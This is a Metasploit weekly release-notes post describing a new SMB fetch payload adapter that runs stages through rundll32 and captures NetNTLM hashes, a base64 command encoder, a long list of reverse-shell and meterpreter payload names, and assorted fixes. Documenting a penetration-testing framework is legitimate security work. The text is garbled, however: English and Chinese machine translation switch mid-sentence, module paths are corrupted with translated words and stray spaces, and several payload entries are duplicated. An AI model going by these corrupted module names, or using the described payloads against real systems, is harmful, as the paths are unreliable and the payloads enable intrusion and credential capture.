Metasploit Weekly Wrap-Up 02/16/2024

Last updated at Fri, 23 Feb 2024 21:39:12 GMT

New Fetch Payload

Metasploit发布这款新游戏已经快一年了 fetch payloads 从那时起，79个漏洞利用模块中有43个支持获取有效载荷. 原始的有效载荷支持通过HTTP、HTTPS和FTP传输第二阶段. This week, Metasploit已经扩展了对SMB的协议支持, allowing payloads to be run using rundll32 它有捕获请求者的NetNTLM哈希的额外好处.

这也简化了用户之前使用的工作流程 exploit/windows/smb/smb_delivery 模块，然后将该命令复制到另一个漏洞中. 现在，用户可以简单地选择一个启用smb的获取有效负载，Metasploit将管理该服务并生成命令.

As an added benefit, since #18680 合并到Metasploit后，可以同时运行多个SMB业务. 这意味着多个启用smb的获取有效负载可以同时运行它们自己的独立处理程序.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

描述:这增加了一个新的编码器模块，该模块利用base64编码来转义Linux和UNIX平台的ARCH_CMD有效负载中的坏字符.

SMB Fetch, Windows shellcode阶段，Windows x64 IPv6绑定TCP阶段

Authors: Spencer McIntyre, bwatters-r7, and sf stephen_fewer@harmonysecurity.com
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

描述:这将添加一个SMB获取有效负载服务和一个使用它的新有效负载. The payload invokes rundll32 但是为用户自动处理一切.

This adapter adds the following payloads:

• cmd/windows/smb/x64/custom/bind_ipv6_tcp
• cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/custom/bind_named_pipe
• cmd/windows/smb/x64/custom/bind_tcp
• cmd/windows/smb/x64/custom/bind_tcp_rc4
• cmd/windows/smb/x64/custom/bind_tcp_uuid
• cmd/windows/smb/x64/custom/reverse_http
• cmd/windows/smb/x64/custom/reverse_http
• cmd/windows/smb/x64/custom/reverse_named_pipe
• cmd/windows/smb/x64/custom/reverse_tcp
• cmd/windows/smb/x64/custom/reverse_tcp_rc4
• cmd/windows/smb/x64/custom/reverse_tcp_uuid
• cmd/windows/smb/x64/custom/reverse_winhttp
• cmd/windows/smb/x64/custom/reverse_winhttp
• cmd / windows / smb / x64 / encrypted_shell / reverse_tcp
• cmd / windows / smb / x64 / encrypted_shell_reverse_tcp
• cmd/windows/smb/x64/exec
• cmd/windows/smb/x64/loadlibrary
• cmd/windows/smb/x64/messagebox
• cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
• cmd / windows / smb / x64 / meterpreter / bind_ipv6_tcp_uuid
• cmd / windows / smb / x64 / meterpreter / bind_named_pipe
• cmd/windows/smb/x64/meterpreter/bind_tcp
• cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
• cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
• cmd/windows/smb/x64/meterpreter/reverse_http
• cmd/windows/smb/x64/meterpreter/reverse_http
• cmd / windows / smb / x64 / meterpreter / reverse_named_pipe
• cmd/windows/smb/x64/meterpreter/reverse_tcp
• cmd / windows / smb / x64 / meterpreter / reverse_tcp_rc4
• cmd / windows / smb / x64 / meterpreter / reverse_tcp_uuid
• cmd / windows / smb / x64 / meterpreter / reverse_winhttp
• cmd / windows / smb / x64 / meterpreter / reverse_winhttp
• cmd / windows / smb / x64 / meterpreter_bind_named_pipe
• cmd/windows/smb/x64/meterpreter_bind_tcp
• cmd/windows/smb/x64/meterpreter_reverse_http
• cmd/windows/smb/x64/meterpreter_reverse_http
• cmd / windows / smb / x64 / meterpreter_reverse_ipv6_tcp
• cmd/windows/smb/x64/meterpreter_reverse_tcp
• cmd/windows/smb/x64/peinject/bind_ipv6_tcp
• cmd / windows / smb / x64 / peinject / bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/peinject/bind_named_pipe
• cmd/windows/smb/x64/peinject/bind_tcp
• cmd/windows/smb/x64/peinject/bind_tcp_rc4
• cmd/windows/smb/x64/peinject/bind_tcp_uuid
• cmd / windows / smb / x64 / peinject / reverse_named_pipe
• cmd/windows/smb/x64/peinject/reverse_tcp
• cmd/windows/smb/x64/peinject/reverse_tcp_rc4
• cmd/windows/smb/x64/peinject/reverse_tcp_uuid
• cmd/windows/smb/x64/pingback_reverse_tcp
• cmd/windows/smb/x64/powershell_bind_tcp
• cmd/windows/smb/x64/powershell_reverse_tcp
• cmd / windows / smb / x64 / powershell_reverse_tcp_ssl
• cmd/windows/smb/x64/shell/bind_ipv6_tcp
• cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/shell/bind_named_pipe
• cmd/windows/smb/x64/shell/bind_tcp
• cmd/windows/smb/x64/shell/bind_tcp_rc4
• cmd/windows/smb/x64/shell/bind_tcp_uuid
• cmd/windows/smb/x64/shell/reverse_tcp
• cmd/windows/smb/x64/shell/reverse_tcp_rc4
• cmd/windows/smb/x64/shell/reverse_tcp_uuid
• cmd/windows/smb/x64/shell_bind_tcp
• cmd/windows/smb/x64/shell_reverse_tcp
• cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
• cmd / windows / smb / x64 / vncinject / bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/vncinject/bind_named_pipe
• cmd/windows/smb/x64/vncinject/bind_tcp
• cmd/windows/smb/x64/vncinject/bind_tcp_rc4
• cmd/windows/smb/x64/vncinject/bind_tcp_uuid
• cmd/windows/smb/x64/vncinject/reverse_http
• cmd/windows/smb/x64/vncinject/reverse_http
• cmd/windows/smb/x64/vncinject/reverse_tcp
• cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
• cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
• cmd/windows/smb/x64/vncinject/reverse_winhttp
• cmd / windows / smb / x64 / vncinject / reverse_winhttp

Enhancements and features (7)

• #18706 from sjanusz-r7 -更新多个PostgreSQL模块，现在与PostgreSQL会话工作. 这个功能隐藏在一个可以启用的特性标志后面 features set postgres_session_type true.
• #18747 from zgoldman-r7 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession 选项，用于控制交互式MSSQL会话的打开. 这个功能目前隐藏在一个可以启用的特性标志后面 features set mssql_session_type true.
• #18759 from cgranleese-r7 -更新多个MySQL模块与提供的MySQL会话工作，而不是打开一个新的连接. 这个功能隐藏在一个可以启用的特性标志后面 features set mysql_session_type true.
• #18763 from zgoldman-r7 -更新多个MSSQL模块，现在可以使用启用的新MSSQL会话类型 features set mssql_session_type true.
• #18806 from cgranleese-r7 —通过建议类似的有效命令，改进未知命令的处理.
• #18809 from zeroSteiner - Makes multiple improvements to the dns Command -一个新的命令，它模仿 /etc/resolv.conf and /etc/hosts. 这个功能目前隐藏在一个可以启用的特性标志后面 features set dns_feature true in msfconsole.
• #18825 from cgranleese-r7 —改善当前会话不兼容post模块时的错误提示.

Bugs fixed (13)

• #18616 from adfoster-r7 修复了AARCH64 SO ELF模板导致SIGBUS异常的问题.
• #18774 from adfoster-r7 -更新以下模块，现在可以使用新版本的 sqlcmd:
  post / windows /收集/凭证/ mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
• #18786 from lihe07 -修复了选项名称冲突的问题 exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
• #18795 from cgranleese-r7 -将CreateSession选项从高级移到模块的基本选项, in order to increase discoverability.
• #18798 from upsidedwn - This fixes an issue in the 利用/ windows /地方/ cve_2020_0787_bits_arbitrary_file_move 导致版本比较失败的模块的检查方法.
• #18799 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_17136 导致版本比较失败的模块的检查方法.
• #18800 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2021_40449 导致版本比较失败的模块的检查方法.
• #18801 from upsidedwn - This fixes an issue in the 利用/ windows /地方/ cve_2022_26904_superprofile 导致版本比较失败的模块的检查方法.
• #18812 from adfoster-r7 - Reverts the auxiliary/scanner/mssql/mssql_login modules's TDSENCRYPTION default value to false.
• #18813 from adfoster-r7 - Fixes a crash when running the help services or help hosts commands.
• #18823 from cdelafuente-r7 修复模块元数据平台列表比较.
• #18826 from dwelch-r7 - Fixes a regression where the windows/smb/psexec 模块未正确执行清理逻辑.
• #18828 from dwelch-r7 修复了利用模块使用nops时的崩溃.

Documentation

您可以在我们的网站上找到最新的Metasploit文档 docs.metasploit.com.

Get it

与往常一样，您可以使用 msfupdate
自上一篇博文以来，你可以从
GitHub:

• Pull Requests 6.3.55...6.3.56
• Full diff 6.3.55...6.3.56

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
要安装fresh而不使用git，您可以使用open-source-only Nightly Installers or the
commercial edition Metasploit Pro